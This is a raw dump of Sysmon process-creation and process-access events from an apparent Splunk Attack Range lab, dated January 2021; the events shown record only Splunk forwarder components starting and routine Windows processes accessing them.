154100x8000000000000000359963Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.958{8e433fbf-36ce-6013-9303-000000001100}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x8000000000000000359962Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36ce-6013-9203-000000001100}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359961Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359960Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359959Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359958Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359957Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a44-6013-0600-000000001100}756876C:\Windows\system32\csrss.exe{8e433fbf-36ce-6013-9203-000000001100}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000359956Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36ce-6013-9203-000000001100}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
154100x8000000000000000359955Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.286{8e433fbf-36ce-6013-9203-000000001100}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x800000000000000032686Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36CE-6013-6703-00000000A401}5076C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032685Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032684Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032683Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032682Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032681Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-36CE-6013-6703-00000000A401}5076C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
10341000x800000000000000032680Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36CE-6013-6703-00000000A401}5076C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
154100x800000000000000032679Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.039{FF16AF91-36CE-6013-6703-00000000A401}5076C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x800000000000000032695Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.507{FF16AF91-36CF-6013-6803-00000000A401}35642596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032694Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36CF-6013-6803-00000000A401}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032693Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032692Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032691Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032690Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032689Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26B4-6013-0500-00000000A401}644760C:\Windows\system32\csrss.exe{FF16AF91-36CF-6013-6803-00000000A401}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
10341000x800000000000000032688Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36CF-6013-6803-00000000A401}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
154100x800000000000000032687Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-36CF-6013-6803-00000000A401}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x8000000000000000359979Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.645{8e433fbf-36cf-6013-9403-000000001100}1019610252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359978Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.488{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36cf-6013-9403-000000001100}10196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359977Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 